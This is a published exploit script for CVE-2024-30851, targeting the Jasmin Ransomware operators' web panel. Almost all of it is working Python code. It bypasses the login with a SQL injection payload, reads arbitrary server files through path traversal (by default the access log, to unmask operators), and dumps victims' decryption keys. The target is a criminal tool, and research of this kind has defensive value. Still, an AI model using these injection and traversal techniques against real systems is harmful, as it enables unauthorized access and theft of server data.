# Exploit Title: Jasmin Ransomware arbitrary file read
# Date: 2024-04-04
# Exploit Author: @_chebuya
# Software Link: https://github.com/codesiddhant/Jasmin-Ransomware
# Version: v1.1
# Tested on: Ubuntu 20.04 LTS
# CVE: CVE-2024-30851
# Description: Jasmin Ransomware panel contains multiple SQL injections and authorization issues, allowing a remote unauthenticated attacker to read arbitrary files off the server and bypass the login
# Github: https://github.com/chebuya/CVE-2024-30851-jasmin-ransomware-path-traversal-poc/tree/main
import requests
import argparse
import os
from bs4 import BeautifulSoup

def get_file(jasmin_url, filepath):
    response = requests.get(
        f'{jasmin_url}/download_file.php?file={filepath}',
        allow_redirects=False
    )

    return response.text


def get_keys(jasmin_url):
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
    }

    data = "username=&password='+or+1%3D1+--+-&service=login"
    login_req = requests.post(f'{jasmin_url}/checklogin.php', headers=headers, data=data)
    cookies = login_req.cookies

    list_req = requests.get(f'{jasmin_url}/dashboard.php', cookies=cookies)
    soup = BeautifulSoup(list_req.text, 'html.parser')

    rows = soup.find_all('tr')

    print(f"Dumping decryption keys from {len(rows)-1} victims")
    for row in rows:
        data = row.find_all('td')
        if len(data) == 0:
            continue
        
        username = data[1].get_text()
        hostname = data[0].get_text()
        filepath = data[7].find('a')['href'].split("=")[1]

        print(f"Decryption key for {username}@{hostname}: {get_file(jasmin_url, filepath)}")


parser = argparse.ArgumentParser(description="LFD/SQLi Exploit PoC for Jasmin Ransomware panel")
subparser = parser.add_subparsers(dest='subcommand')

file_parser = subparser.add_parser("getfile", help="Read a file off the server")
file_parser.add_argument("-u", "--url", required=True, help="The jasmin ransomware web panel url (http://target_server)")
file_parser.add_argument("-f", "--file", default="c:/xampp/apache/logs/access.log", help="The file to read on the target server") # Default is the access log, deanonymize the operators!

keys_parser = subparser.add_parser("getkeys", help="Get decryption keys of victims")
keys_parser.add_argument("-u", "--url", required=True, help="The jasmin ransomware web panel url (http://target_server)")

args = parser.parse_args()

if args.subcommand != None:
    target_url = args.url.rstrip("/")

if args.subcommand == "getkeys":
    get_keys(target_url)
elif args.subcommand == "getfile":
    target_file = args.file.replace("\\", "/").replace("c:", "")
    target_path = os.path.join("../../../../../../../../../", target_file)
    print(get_file(target_url, target_path))
else:
    parser.print_help()